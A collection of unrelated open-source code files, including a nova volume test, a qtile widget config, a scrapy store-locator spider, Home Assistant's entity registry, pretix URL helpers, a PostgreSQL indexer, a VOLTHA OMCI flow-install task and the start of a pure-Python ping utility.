data=y, axes_series=[tseries, xseries], ) cls = cls or SpectrumSeries return cls.from_field( # see SpectrumSeries.from_field() field, name=self.name, technique=self.technique, tstamp=self.tstamp )
the-stack_106_24354
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from nova.tests.unit.virt.libvirt.volume import test_volume from nova.virt.libvirt.volume import gpfs class LibvirtGPFSVolumeDriverTestCase(test_volume.LibvirtVolumeBaseTestCase): def test_libvirt_gpfs_driver_get_config(self): libvirt_driver = gpfs.LibvirtGPFSVolumeDriver(self.fake_conn) connection_info = { 'driver_volume_type': 'gpfs', 'data': { 'device_path': '/gpfs/foo', }, 'serial': 'fake_serial', } conf = libvirt_driver.get_config(connection_info, self.disk_info) tree = conf.format_dom() self.assertEqual('file', tree.get('type')) self.assertEqual('fake_serial', tree.find('./serial').text)
the-stack_106_24355
#! /usr/bin/env python """ Given a signed 32-bit integer x, return x with its digits reversed. If reversing x causes the value to go outside the signed 32-bit integer range [-231, 231 - 1], then return 0. Assume the environment does not allow you to store 64-bit integers (signed or unsigned). Example 1: Input: x = 123 Output: 321 Example 2: Input: x = -123 Output: -321 Example 3: Input: x = 120 Output: 21 Example 4: Input: x = 0 Output: 0 Constraints: -231 <= x <= 231 - 1 """ import unittest def reverse(x: int) -> int: """ O(n) time and O(n) space as we reverse the integer string. """ x_str = str(x) is_neg = x_str[0] == "-" rev_s = x_str[::-1] rev = -int(rev_s[:-1]) if is_neg else int(rev_s) if rev < -(2 ** 31) or rev > (2 ** 31 - 1): return 0 return rev class TestSolution(unittest.TestCase): def test_example(self): x = 123 ans = reverse(x) self.assertEqual(ans, 321) def test_neg(self): x = -123 ans = reverse(x) self.assertEqual(ans, -321) def test_zero(self): x = 120 ans = reverse(x) self.assertEqual(ans, 21) def test_many_zeros(self): x = 100000 ans = reverse(x) self.assertEqual(ans, 1) def test_overflow(self): x = 4294967294 ans = reverse(x) self.assertEqual(ans, 0) def test_neg_overflow(self): x = -4294967294 ans = reverse(x) self.assertEqual(ans, 0) if __name__ == "__main__": unittest.main()
the-stack_106_24356
import os import socket from libqtile import qtile, widget from settings.shortcut import terminal, font from settings.themes import colors from settings.widgets_mod import * # PRYMARY WIDGETS LIST def init_widgets_list(): widgets_list = [ group_box(colors["color2"], colors["color3"]), current_layout(), window_name(), widget.CapsNumLockIndicator( font=f"{font} Bold", fontsize=12, fmt="{}", foreground=colors["color4"], ), widget.Volume( font=f"{font}", fmt="\uf026 {}", foreground=colors["color3"], mouse_callbacks={ "Button3": lambda: qtile.cmd_spawn("pavucontrol"), }, ), widget.Battery( font=f"{font} Bold", format=" {percent:2.0%} \ufbd3", mouse_callbacks={ "Button1": lambda: qtile.cmd_spawn("xfce4-power-manager-settings"), "Button2": lambda: qtile.cmd_spawn(terminal + " -e htop"), "Button3": lambda: qtile.cmd_spawn("xfce4-taskmanager"), }, update_interval=10, foreground=colors["color2"], ), widget.CheckUpdates( font=f"{font} Bold", distro="Arch_checkupdates", execute=f"{terminal} -e sudo pacman -Syu", update_interval=1800, display_format='\uf547 {updates} Updates', colour_have_updates=colors["color1"], ), widget.Clock( font=f"{font} Bold", format="\uf5ec %c", mouse_callbacks={ "Button1": lambda: qtile.cmd_spawn(terminal + " -e calcurse"), "Button3": lambda: qtile.cmd_spawn("gnome-calendar") }, foreground=colors["color1"], ), systray(size=22), ] return widgets_list # SECONDARY WINDEWTS LIST def init_widgets_list01(): widgets_list = [ current_layout(), window_name(), group_box(colors["color3"], colors["color2"]), ] return widgets_list
the-stack_106_24357
# -*- coding: utf-8 -*- import json import re import scrapy from locations.hours import OpeningHours from locations.items import GeojsonPointItem class FnbUSSpider(scrapy.Spider): name = "fnb_us" item_attributes = {"brand": "First National Bank", "brand_wikidata": "Q5426765"} allowed_domains = ["fnb-online.com"] start_urls = ("https://locations.fnb-online.com/sitemap.xml",) def parse(self, response): response.selector.remove_namespaces() for url in response.xpath("//loc/text()").extract(): if url.count("/") == 4: # These are dead links meta = {"dont_redirect": True} yield scrapy.Request(url, callback=self.parse_store, meta=meta) def parse_store(self, response): script = response.xpath( '//script/text()[contains(.,"var location_data")]' ).get() start = script.index("var location_data =") + len("var location_data =") data = json.decoder.JSONDecoder().raw_decode(script, start)[0][0] properties = { "ref": data["id"], "lat": data["lat"], "lon": data["lng"], "name": data["name"], "addr_full": data["address"], "city": data["city"], "state": data["state"], "postcode": data["postalcode"], "country": data["country"], "phone": "phone", "website": response.url, "opening_hours": data["branchhours"], } yield GeojsonPointItem(**properties)
the-stack_106_24360
"""Provide a registry to track entity IDs. The Entity Registry keeps a registry of entities. Entities are uniquely identified by their domain, platform and a unique id provided by that platform. The Entity Registry will persist itself 10 seconds after a new entity is registered. Registering a new entity while a timer is in progress resets the timer. After initializing, call EntityRegistry.async_ensure_loaded to load the data from disk. """ from collections import OrderedDict from itertools import chain import logging import os import weakref import attr from ..core import callback, split_entity_id from ..loader import bind_hass from ..util import ensure_unique_string, slugify from ..util.yaml import load_yaml, save_yaml PATH_REGISTRY = 'entity_registry.yaml' DATA_REGISTRY = 'entity_registry' SAVE_DELAY = 10 _LOGGER = logging.getLogger(__name__) _UNDEF = object() DISABLED_HASS = 'hass' DISABLED_USER = 'user' @attr.s(slots=True, frozen=True) class RegistryEntry: """Entity Registry Entry.""" entity_id = attr.ib(type=str) unique_id = attr.ib(type=str) platform = attr.ib(type=str) name = attr.ib(type=str, default=None) config_entry_id = attr.ib(type=str, default=None) disabled_by = attr.ib( type=str, default=None, validator=attr.validators.in_((DISABLED_HASS, DISABLED_USER, None))) update_listeners = attr.ib(type=list, default=attr.Factory(list), repr=False) domain = attr.ib(type=str, init=False, repr=False) @domain.default def _domain_default(self): """Compute domain value.""" return split_entity_id(self.entity_id)[0] @property def disabled(self): """Return if entry is disabled.""" return self.disabled_by is not None def add_update_listener(self, listener): """Listen for when entry is updated. Listener: Callback function(old_entry, new_entry) """ self.update_listeners.append(weakref.ref(listener)) class EntityRegistry: """Class to hold a registry of entities.""" def __init__(self, hass): """Initialize the registry.""" self.hass = hass self.entities = None self._load_task = None self._sched_save = None @callback def async_is_registered(self, entity_id): """Check if an entity_id is currently registered.""" return entity_id in self.entities @callback def async_get_entity_id(self, domain: str, platform: str, unique_id: str): """Check if an entity_id is currently registered.""" for entity in self.entities.values(): if entity.domain == domain and entity.platform == platform and \ entity.unique_id == unique_id: return entity.entity_id return None @callback def async_generate_entity_id(self, domain, suggested_object_id): """Generate an entity ID that does not conflict. Conflicts checked against registered and currently existing entities. """ return ensure_unique_string( '{}.{}'.format(domain, slugify(suggested_object_id)), chain(self.entities.keys(), self.hass.states.async_entity_ids(domain)) ) @callback def async_get_or_create(self, domain, platform, unique_id, *, suggested_object_id=None, config_entry_id=None): """Get entity. Create if it doesn't exist.""" entity_id = self.async_get_entity_id(domain, platform, unique_id) if entity_id: return self.entities[entity_id] entity_id = self.async_generate_entity_id( domain, suggested_object_id or '{}_{}'.format(platform, unique_id)) entity = RegistryEntry( entity_id=entity_id, config_entry_id=config_entry_id, unique_id=unique_id, platform=platform, ) self.entities[entity_id] = entity _LOGGER.info('Registered new %s.%s entity: %s', domain, platform, entity_id) self.async_schedule_save() return entity @callback def async_update_entity(self, entity_id, *, name=_UNDEF): """Update properties of an entity.""" old = self.entities[entity_id] changes = {} if name is not _UNDEF and name != old.name: changes['name'] = name if not changes: return old new = self.entities[entity_id] = attr.evolve(old, **changes) to_remove = [] for listener_ref in new.update_listeners: listener = listener_ref() if listener is None: to_remove.append(listener) else: try: listener.async_registry_updated(old, new) except Exception: # pylint: disable=broad-except _LOGGER.exception('Error calling update listener') for ref in to_remove: new.update_listeners.remove(ref) self.async_schedule_save() return new async def async_ensure_loaded(self): """Load the registry from disk.""" if self.entities is not None: return if self._load_task is None: self._load_task = self.hass.async_add_job(self._async_load) await self._load_task async def _async_load(self): """Load the entity registry.""" path = self.hass.config.path(PATH_REGISTRY) entities = OrderedDict() if os.path.isfile(path): data = await self.hass.async_add_job(load_yaml, path) for entity_id, info in data.items(): entities[entity_id] = RegistryEntry( entity_id=entity_id, config_entry_id=info.get('config_entry_id'), unique_id=info['unique_id'], platform=info['platform'], name=info.get('name'), disabled_by=info.get('disabled_by') ) self.entities = entities self._load_task = None @callback def async_schedule_save(self): """Schedule saving the entity registry.""" if self._sched_save is not None: self._sched_save.cancel() self._sched_save = self.hass.loop.call_later( SAVE_DELAY, self.hass.async_add_job, self._async_save ) async def _async_save(self): """Save the entity registry to a file.""" self._sched_save = None data = OrderedDict() for entry in self.entities.values(): data[entry.entity_id] = { 'config_entry_id': entry.config_entry_id, 'unique_id': entry.unique_id, 'platform': entry.platform, 'name': entry.name, } await self.hass.async_add_job( save_yaml, self.hass.config.path(PATH_REGISTRY), data) @bind_hass async def async_get_registry(hass) -> EntityRegistry: """Return entity registry instance.""" registry = hass.data.get(DATA_REGISTRY) if registry is None: registry = hass.data[DATA_REGISTRY] = EntityRegistry(hass) await registry.async_ensure_loaded() return registry
the-stack_106_24361
import numpy as np import openml import pandas as pd import scipy.sparse as sp __all__ = ['query_regression_tasks', 'load_openml'] def query_regression_tasks(n_samples_min=100, n_samples_max=5000, n_features_max=None): task_list = openml.tasks.list_tasks(task_type_id=2) tasks = pd.DataFrame.from_dict(task_list, orient='index') # filter tasks with all numeric features tasks = (tasks.query('NumberOfInstances <= {}'.format(n_samples_max)) .query('NumberOfInstances >= {}'.format(n_samples_min)) #.query('NumberOfNumericFeatures == NumberOfFeatures') .query('NumberOfInstancesWithMissingValues == 0.0')) if n_features_max: tasks = tasks.query('NumberOfFeatures <= {}'.format(n_features_max)) return tasks[['did', 'name', 'NumberOfInstances', 'NumberOfFeatures']] def load_openml(name, n_samples_min=100, n_samples_max=50000): tasks = query_regression_tasks(n_samples_min=n_samples_min, n_samples_max=n_samples_max) dataset_id = int(tasks.query('name == "{0}"'.format(name))['did'].values[0]) dataset = openml.datasets.get_dataset(dataset_id) X, y, categorical_indicator, attribute_names = dataset.get_data( dataset_format='array', target=dataset.default_target_attribute ) if sp.issparse(X): X = X.toarray() return X.astype(np.float64), y.astype(np.float64)
the-stack_106_24365
# # This file is part of pretix (Community Edition). # # Copyright (C) 2014-2020 Raphael Michel and contributors # Copyright (C) 2020-2021 rami.io GmbH and contributors # # This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General # Public License as published by the Free Software Foundation in version 3 of the License. # # ADDITIONAL TERMS APPLY: Pursuant to Section 7 of the GNU Affero General Public License, additional terms are # applicable granting you additional permissions and placing additional restrictions on your usage of this software. # Please refer to the pretix LICENSE file to obtain the full terms applicable to this work. If you did not receive # this file, see <https://pretix.eu/about/en/license>. # # This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied # warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more # details. # # You should have received a copy of the GNU Affero General Public License along with this program. If not, see # <https://www.gnu.org/licenses/>. # # This file is based on an earlier version of pretix which was released under the Apache License 2.0. The full text of # the Apache License 2.0 can be obtained at <http://www.apache.org/licenses/LICENSE-2.0>. # # This file may have since been changed and any changes are released under the terms of AGPLv3 as described above. A # full history of changes and contributors is available at <https://github.com/pretix/pretix>. # # This file contains Apache-licensed contributions copyrighted by: Tobias Kunze # # Unless required by applicable law or agreed to in writing, software distributed under the Apache License 2.0 is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations under the License. from urllib.parse import urljoin, urlsplit from django.conf import settings from django.db.models import Q from django.urls import reverse from pretix.base.models import Event, Organizer from .models import KnownDomain def get_event_domain(event, fallback=False, return_info=False): assert isinstance(event, Event) suffix = ('_fallback' if fallback else '') + ('_info' if return_info else '') domain = getattr(event, '_cached_domain' + suffix, None) or event.cache.get('domain' + suffix) if domain is None: domain = None, None if fallback: domains = KnownDomain.objects.filter( Q(event=event) | Q(organizer_id=event.organizer_id, event__isnull=True) ) domains_event = [d for d in domains if d.event_id == event.pk] domains_org = [d for d in domains if not d.event_id] if domains_event: domain = domains_event[0].domainname, "event" elif domains_org: domain = domains_org[0].domainname, "organizer" else: domains = event.domains.all() domain = domains[0].domainname if domains else None, "event" event.cache.set('domain' + suffix, domain or 'none') setattr(event, '_cached_domain' + suffix, domain or 'none') elif domain == 'none': setattr(event, '_cached_domain' + suffix, 'none') domain = None, None else: setattr(event, '_cached_domain' + suffix, domain) return domain if return_info or not isinstance(domain, tuple) else domain[0] def get_organizer_domain(organizer): assert isinstance(organizer, Organizer) domain = getattr(organizer, '_cached_domain', None) or organizer.cache.get('domain') if domain is None: domains = organizer.domains.filter(event__isnull=True) domain = domains[0].domainname if domains else None organizer.cache.set('domain', domain or 'none') organizer._cached_domain = domain or 'none' elif domain == 'none': organizer._cached_domain = 'none' return None else: organizer._cached_domain = domain return domain def mainreverse(name, kwargs=None): """ Works similar to ``django.core.urlresolvers.reverse`` but uses the maindomain URLconf even if on a subpath. Non-keyword arguments are not supported as we want do discourage using them for better readability. :param name: The name of the URL route :type name: str :param kwargs: A dictionary of additional keyword arguments that should be used. You do not need to provide the organizer or event slug here, it will be added automatically as needed. :returns: An absolute URL (including scheme and host) as a string """ from pretix.multidomain import maindomain_urlconf kwargs = kwargs or {} return reverse(name, kwargs=kwargs, urlconf=maindomain_urlconf) def eventreverse(obj, name, kwargs=None): """ Works similar to ``django.core.urlresolvers.reverse`` but takes into account that some organizers or events might have their own (sub)domain instead of a subpath. Non-keyword arguments are not supported as we want do discourage using them for better readability. :param obj: An ``Event`` or ``Organizer`` object :param name: The name of the URL route :type name: str :param kwargs: A dictionary of additional keyword arguments that should be used. You do not need to provide the organizer or event slug here, it will be added automatically as needed. :returns: An absolute URL (including scheme and host) as a string """ from pretix.multidomain import ( event_domain_urlconf, maindomain_urlconf, organizer_domain_urlconf, ) c = None if not kwargs: c = obj.cache url = c.get('urlrev_{}'.format(name)) if url: return url kwargs = kwargs or {} if isinstance(obj, Event): organizer = obj.organizer event = obj kwargs['event'] = obj.slug elif isinstance(obj, Organizer): organizer = obj event = None else: raise TypeError('obj should be Event or Organizer') if event: domain, domaintype = get_event_domain(obj, fallback=True, return_info=True) else: domain, domaintype = get_organizer_domain(organizer), "organizer" if domain: if domaintype == "event" and 'event' in kwargs: del kwargs['event'] if 'organizer' in kwargs: del kwargs['organizer'] path = reverse(name, kwargs=kwargs, urlconf=event_domain_urlconf if domaintype == "event" else organizer_domain_urlconf) siteurlsplit = urlsplit(settings.SITE_URL) if siteurlsplit.port and siteurlsplit.port not in (80, 443): domain = '%s:%d' % (domain, siteurlsplit.port) return urljoin('%s://%s' % (siteurlsplit.scheme, domain), path) kwargs['organizer'] = organizer.slug url = reverse(name, kwargs=kwargs, urlconf=maindomain_urlconf) if not kwargs and c: c.set('urlrev_{}'.format(url), url) return url def build_absolute_uri(obj, urlname, kwargs=None): reversedurl = eventreverse(obj, urlname, kwargs) if '://' in reversedurl: return reversedurl return urljoin(settings.SITE_URL, reversedurl)
the-stack_106_24368
__copyright__ = "Copyright (c) 2021 Jina AI Limited. All rights reserved." __license__ = "Apache-2.0" from typing import Tuple, Generator import numpy as np from jina.executors.indexers.dbms import BaseDBMSIndexer from jina.executors.indexers.dump import export_dump_streaming from .postgreshandler import PostgreSQLDBMSHandler class PostgreSQLDBMSIndexer(BaseDBMSIndexer): """:class:`PostgreSQLDBMSIndexer` PostgreSQL based BDMS Indexer. Initialize the PostgreSQLDBIndexer. :param hostname: hostname of the machine :param port: the port :param username: the username to authenticate :param password: the password to authenticate :param database: the database name :param table: the table name to use :param args: other arguments :param kwargs: other keyword arguments """ def __init__( self, hostname: str = '127.0.0.1', port: int = 5432, username: str = 'postgres', password: str = '123456', database: str = 'postgres', table: str = 'default_table', *args, **kwargs ): super().__init__(*args, **kwargs) self.hostname = hostname self.port = port self.username = username self.password = password self.database = database self.table = table def _get_generator(self) -> Generator[Tuple[str, np.array, bytes], None, None]: with self.handler as handler: # always order the dump by id as integer handler.cursor.execute(f"SELECT * from {handler.table} ORDER BY ID::int") records = handler.cursor.fetchall() for rec in records: yield rec[0], rec[1], rec[2] @property def size(self): """Obtain the size of the table .. # noqa: DAR201 """ with self.handler as postgres_handler: postgres_handler.cursor.execute(f"SELECT COUNT(*) from {self.handler.table}") records = postgres_handler.cursor.fetchall() return records[0][0] def post_init(self): """Initialize the PostgresHandler inside the Indexer.""" from .postgreshandler import PostgreSQLDBMSHandler super().post_init() self.handler = PostgreSQLDBMSHandler( hostname=self.hostname, port=self.port, username=self.username, password=self.password, database=self.database, table=self.table) def get_handler(self) -> 'PostgreSQLDBMSHandler': """Get the handler to PostgreSQLDBMS.""" return self.handler def get_add_handler(self) -> 'PostgreSQLDBMSHandler': """Get the handler to PostgresSQLDBMS.""" return self.handler def get_create_handler(self) -> 'PostgreSQLDBMSHandler': """Get the handler to PostgresSQLDBMS.""" return self.handler def get_query_handler(self) -> 'PostgreSQLDBMSHandler': """Get the handler to PostgresSQLDBMS.""" return self.handler def add(self, ids, vecs, metas, *args, **kwargs): """Add a Document to PostgreSQLDBMS. :param ids: List of doc ids to be added :param vecs: List of vecs to be added :param metas: List of metas of docs to be added """ with self.handler as postgres_handler: postgres_handler.add(ids=ids, vecs=vecs, metas=metas) def update(self, ids, vecs, metas, *args, **kwargs): """Updated document from the database. :param ids: Ids of Docs to be updated :param vecs: List of vecs to be updated :param metas: List of metas of docs to be updated """ with self.handler as postgres_handler: postgres_handler.update(ids=ids, vecs=vecs, metas=metas) def delete(self, ids, *args, **kwargs): """Delete document from the database. :param ids: Ids of Document to be removed """ with self.handler as postgres_handler: postgres_handler.delete(ids=ids) def dump(self, path, shards): """Dump the index :param path: the path to which to dump :param shards: the nr of shards to which to dump """ export_dump_streaming( path, shards=shards, size=self.size, data=self._get_generator() )
the-stack_106_24370
# # Copyright 2018 the original author or authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from twisted.internet import reactor from twisted.internet.defer import inlineCallbacks, failure, returnValue from voltha.extensions.omci.omci_me import * from voltha.extensions.omci.tasks.task import Task from voltha.extensions.omci.omci_defs import * from voltha.adapters.adtran_onu.flow.flow_entry import FlowEntry OP = EntityOperations RC = ReasonCodes class ServiceInstallFailure(Exception): """ This error is raised by default when the flow-install fails """ class AdtnInstallFlowTask(Task): """ OpenOMCI MIB Flow Install Task Currently, the only service tech profiles expected by v2.0 will be for AT&T residential data service and DT residential data service. """ task_priority = Task.DEFAULT_PRIORITY + 10 name = "ADTRAN MIB Install Flow Task" def __init__(self, omci_agent, handler, flow_entry): """ Class initialization :param omci_agent: (OpenOMCIAgent) OMCI Adapter agent :param handler: (AdtranOnuHandler) ONU Handler :param flow_entry: (FlowEntry) Flow to install """ super(AdtnInstallFlowTask, self).__init__(AdtnInstallFlowTask.name, omci_agent, handler.device_id, priority=AdtnInstallFlowTask.task_priority, exclusive=False) self._handler = handler self._onu_device = omci_agent.get_device(handler.device_id) self._local_deferred = None self._flow_entry = flow_entry self._install_by_delete = True # TODO: Cleanup below that is not needed is_upstream = flow_entry.flow_direction in FlowEntry.upstream_flow_types uni_port = flow_entry.in_port if is_upstream else flow_entry.out_port pon_port = flow_entry.out_port if is_upstream else flow_entry.in_port self._uni = handler.uni_port(uni_port) self._pon = handler.pon_port(pon_port) # Entity IDs. IDs with values can probably be most anything for most ONUs, # IDs set to None are discovered/set # # TODO: Probably need to store many of these in the appropriate object (UNI, PON,...) # self._ethernet_uni_entity_id = self._handler.uni_ports[0].entity_id self._ieee_mapper_service_profile_entity_id = self._pon.hsi_8021p_mapper_entity_id # self._hsi_mac_bridge_port_ani_entity_id = self._pon.hsi_mac_bridge_port_ani_entity_id # Next to are specific self._mac_bridge_service_profile_entity_id = handler.mac_bridge_service_profile_entity_id def cancel_deferred(self): super(AdtnInstallFlowTask, self).cancel_deferred() d, self._local_deferred = self._local_deferred, None try: if d is not None and not d.called: d.cancel() except: pass def start(self): """ Start the flow installation """ super(AdtnInstallFlowTask, self).start() self._local_deferred = reactor.callLater(0, self.perform_flow_install) def stop(self): """ Shutdown flow install task """ self.log.debug('stopping') self.cancel_deferred() super(AdtnInstallFlowTask, self).stop() def check_status_and_state(self, results, operation=''): """ Check the results of an OMCI response. An exception is thrown if the task was cancelled or an error was detected. :param results: (OmciFrame) OMCI Response frame :param operation: (str) what operation was being performed :return: True if successful, False if the entity existed (already created) """ omci_msg = results.fields['omci_message'].fields status = omci_msg['success_code'] error_mask = omci_msg.get('parameter_error_attributes_mask', 'n/a') failed_mask = omci_msg.get('failed_attributes_mask', 'n/a') unsupported_mask = omci_msg.get('unsupported_attributes_mask', 'n/a') self.log.debug(operation, status=status, error_mask=error_mask, failed_mask=failed_mask, unsupported_mask=unsupported_mask) if status == RC.Success: self.strobe_watchdog() return True elif status == RC.InstanceExists: return False elif status == RC.UnknownInstance and operation == 'delete': return True raise ServiceInstallFailure('{} failed with a status of {}, error_mask: {}, failed_mask: {}, unsupported_mask: {}' .format(operation, status, error_mask, failed_mask, unsupported_mask)) @inlineCallbacks def perform_flow_install(self): """ Send the commands to configure the flow. Currently this task uses the pre-installed default TCONT and GEM Port. This will change when Technology Profiles are supported. """ self.log.info('perform-flow-install', vlan_vid=self._flow_entry.vlan_vid) if self._flow_entry.vlan_vid == 0: return def resources_available(): # TODO: Rework for non-xpon mode return (len(self._handler.uni_ports) > 0 and len(self._pon.tconts) and len(self._pon.gem_ports)) if self._handler.enabled and resources_available(): omci = self._onu_device.omci_cc brg_id = self._mac_bridge_service_profile_entity_id vlan_vid = self._flow_entry.vlan_vid if self._install_by_delete: # Delete any existing flow before adding this new one msg = ExtendedVlanTaggingOperationConfigurationDataFrame(brg_id, attributes=None) frame = msg.delete() try: results = yield omci.send(frame) self.check_status_and_state(results, operation='delete') attributes = dict( association_type=2, # Assoc Type, PPTP Ethernet UNI associated_me_pointer=self._ethernet_uni_entity_id # Assoc ME, PPTP Entity Id ) frame = ExtendedVlanTaggingOperationConfigurationDataFrame( self._mac_bridge_service_profile_entity_id, attributes=attributes ).create() results = yield omci.send(frame) self.check_status_and_state(results, 'flow-recreate-before-set') # TODO: Any of the following needed as well # # Delete bridge ani side vlan filter # msg = VlanTaggingFilterDataFrame(self._hsi_mac_bridge_port_ani_entity_id) # frame = msg.delete() # # results = yield omci.send(frame) # self.check_status_and_state(results, 'flow-delete-vlan-tagging-filter-data') # # # Re-Create bridge ani side vlan filter # msg = VlanTaggingFilterDataFrame( # self._hsi_mac_bridge_port_ani_entity_id, # Entity ID # vlan_tcis=[vlan_vid], # VLAN IDs # forward_operation=0x10 # ) # frame = msg.create() # # results = yield omci.send(frame) # self.check_status_and_state(results, 'flow-create-vlan-tagging-filter-data') except Exception as e: self.log.exception('flow-delete-before-install-failure', e=e) self.deferred.errback(failure.Failure(e)) returnValue(None) try: # Now set the VLAN Tagging Operation up as we want it # Update uni side extended vlan filter # filter for untagged # probably for eapol # TODO: lots of magic # attributes = dict( # # This table filters and tags upstream frames # received_frame_vlan_tagging_operation_table= # VlanTaggingOperation( # filter_outer_priority=15, # This entry is not a double-tag rule (ignore out tag rules) # filter_outer_vid=4096, # Do not filter on the outer VID value # filter_outer_tpid_de=0, # Do not filter on the outer TPID field # # filter_inner_priority=15, # This is a no-tag rule, ignore all other VLAN tag filter fields # filter_inner_vid=4096, # Do not filter on the inner VID # filter_inner_tpid_de=0, # Do not filter on inner TPID field # filter_ether_type=0, # Do not filter on EtherType # # treatment_tags_to_remove=0, # Remove 0 tags # # treatment_outer_priority=15, # Do not add an outer tag # treatment_outer_vid=0, # n/a # treatment_outer_tpid_de=0, # n/a # # treatment_inner_priority=0, # Add an inner tag and insert this value as the priority # treatment_inner_vid=vlan_vid, # Push this tag onto the frame # treatment_inner_tpid_de=4 # set TPID # ) # ) # msg = ExtendedVlanTaggingOperationConfigurationDataFrame( # self._mac_bridge_service_profile_entity_id, # Bridge Entity ID # attributes=attributes # See above # ) # frame = msg.set() # # results = yield omci.send(frame) # self.check_status_and_state(results, # 'flow-set-ext-vlan-tagging-op-config-data-untagged') # Update uni side extended vlan filter # filter for vlan 0 # TODO: lots of magic ################################################################################ # Update Extended VLAN Tagging Operation Config Data # # Specifies the TPIDs in use and that operations in the downstream direction are # inverse to the operations in the upstream direction # TODO: Downstream mode may need to be modified once we work more on the flow rules attributes = dict( input_tpid=0x8100, # input TPID output_tpid=0x8100, # output TPID downstream_mode=0, # inverse of upstream ) msg = ExtendedVlanTaggingOperationConfigurationDataFrame( self._mac_bridge_service_profile_entity_id, # Bridge Entity ID attributes=attributes # See above ) frame = msg.set() results = yield omci.send(frame) self.check_status_and_state(results, 'set-extended-vlan-tagging-operation-configuration-data') attributes = dict( received_frame_vlan_tagging_operation_table= VlanTaggingOperation( filter_outer_priority=15, # This entry is not a double-tag rule filter_outer_vid=4096, # Do not filter on the outer VID value filter_outer_tpid_de=0, # Do not filter on the outer TPID field filter_inner_priority=15, # This is a no-tag rule, ignore all other VLAN tag filter fields filter_inner_vid=0x1000, # Do not filter on the inner VID filter_inner_tpid_de=0, # Do not filter on inner TPID field filter_ether_type=0, # Do not filter on EtherType treatment_tags_to_remove=0, # Remove 0 tags treatment_outer_priority=15, # Do not add an outer tag treatment_outer_vid=0, # n/a treatment_outer_tpid_de=0, # n/a treatment_inner_priority=0, # Add an inner tag and insert this value as the priority treatment_inner_vid=vlan_vid, # use this value as the VID in the inner VLAN tag treatment_inner_tpid_de=4, # set TPID ) ) msg = ExtendedVlanTaggingOperationConfigurationDataFrame( self._mac_bridge_service_profile_entity_id, # Bridge Entity ID attributes=attributes # See above ) frame = msg.set() results = yield omci.send(frame) self.check_status_and_state(results, 'flow-set-ext-vlan-tagging-op-config-data-untagged') self.deferred.callback('flow-install-success') except Exception as e: # TODO: Better context info for this exception output... self.log.exception('failed-to-install-flow', e=e) self.deferred.errback(failure.Failure(e)) else: # TODO: Provide better error reason, what was missing... e = ServiceInstallFailure('Required resources are not available') self.deferred.errback(failure.Failure(e))
the-stack_106_24371
#!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import division, print_function """ A pure python ping implementation using raw sockets. Compatibility: OS: Linux, Windows, MacOSX Python: 2.6 - 3.5 Note that due to the usage of RAW sockets root/Administrator privileges are requied. Derived from ping.c distributed in Linux's netkit. That code is copyright (c) 1989 by The Regents of the University of California. That code is in turn derived from code written by Mike Muuss of the US Army Ballistic Research Laboratory in December, 1983 and placed in the public domain. They have my thanks. Copyright (c) Matthew Dixon Cowles, <http://www.visi.com/~mdc/>. Distributable under the terms of the GNU General Public License version 2. Provided with no warranties of any sort. website: https://github.com/l4m3rx/python-ping """ # TODO Remove any calls to time.sleep # This would enable extension into larger framework that aren't multi threaded. import os import sys import time import array import socket import struct import select import signal if __name__ == '__main__': import argparse try: from _thread import get_ident except ImportError: def get_ident(): return 0 if sys.platform == "win32": # On Windows, the best timer is time.clock() default_timer = time.clock else: # On most other platforms the best timer is time.time() default_timer = time.time # ICMP parameters ICMP_ECHOREPLY = 0 # Echo reply (per RFC792) ICMP_ECHO = 8 # Echo request (per RFC792) ICMP_ECHO_IPV6 = 128 # Echo request (per RFC4443) ICMP_ECHO_IPV6_REPLY = 129 # Echo request (per RFC4443) ICMP_MAX_RECV = 2048 # Max size of incoming buffer MAX_SLEEP = 1000 class MStats2(object): def __init__(self): self._this_ip = '0.0.0.0' self.reset() def reset(self): self._timing_list = [] self._packets_sent = 0 self._packets_rcvd = 0 self._reset_statistics() @property def thisIP(self): return self._this_ip @thisIP.setter def thisIP(self, value): self._this_ip = value @property def pktsSent(self): return self._packets_sent @property def pktsRcvd(self): return self._packets_rcvd @property def pktsLost(self): return self._packets_sent - self._packets_rcvd @property def minTime(self): return min(self._timing_list) if self._timing_list else None @property def maxTime(self): return max(self._timing_list) if self._timing_list else None @property def totTime(self): if self._total_time is None: self._total_time = sum(self._timing_list) return self._total_time def _get_mean_time(self): if self._mean_time is None: if len(self._timing_list) > 0: self._mean_time = self.totTime / len(self._timing_list) return self._mean_time mean_time = property(_get_mean_time) avrgTime = property(_get_mean_time) @property def median_time(self): if self._median_time is None: self._median_time = self._calc_median_time() return self._median_time @property def pstdev_time(self): """Returns the 'Population Standard Deviation' of the set.""" if self._pstdev_time is None: self._pstdev_time = self._calc_pstdev_time() return self._pstdev_time @property def fracLoss(self): if self._frac_loss is None: if self.pktsSent > 0: self._frac_loss = self.pktsLost / self.pktsSent return self._frac_loss def packet_sent(self, n=1): self._packets_sent += n def packet_received(self, n=1): self._packets_rcvd += n def record_time(self, value): self._timing_list.append(value) self._reset_statistics() def _reset_statistics(self): self._total_time = None self._mean_time = None self._median_time = None self._pstdev_time = None self._frac_loss = None def _calc_median_time(self): n = len(self._timing_list) if n == 0: return None if n & 1 == 1: # Odd number of samples? Return the middle. return sorted(self._timing_list)[n//2] else: # Even number of samples? Return the mean of the two middle samples. halfn = n // 2 return sum(sorted(self._timing_list)[halfn:halfn+2]) / 2 def _calc_sum_square_time(self): mean = self.mean_time return sum(((t - mean)**2 for t in self._timing_list)) def 